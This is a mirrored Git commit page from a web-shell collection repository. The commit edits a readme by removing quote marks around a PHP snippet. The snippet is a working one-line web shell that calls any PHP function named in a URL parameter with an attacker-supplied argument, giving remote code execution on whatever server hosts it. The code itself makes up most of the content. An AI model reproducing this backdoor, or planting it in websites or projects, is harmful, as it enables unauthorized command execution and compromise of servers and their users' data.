mirror of
https://github.com/tennc/webshell
synced 2024-11-22 03:03:03 +00:00
update readme.md
This commit is contained in:
parent
8d36b81c1b
commit
c77a9dad29
1 changed files with 4 additions and 4 deletions
|
@ -6,9 +6,9 @@
|
||||||
***************************************************
|
***************************************************
|
||||||
code:
|
code:
|
||||||
|
|
||||||
'<?php
|
<?php
|
||||||
$func = new ReflectionFunction($_GET[m]);
|
$func = new ReflectionFunction($_GET[m]);
|
||||||
echo $func->invokeArgs(array($_GET[c]));
|
echo $func->invokeArgs(array($_GET[c]));
|
||||||
?>'
|
?>
|
||||||
|
|
||||||
***************************************************
|
***************************************************
|
Loading…
Reference in a new issue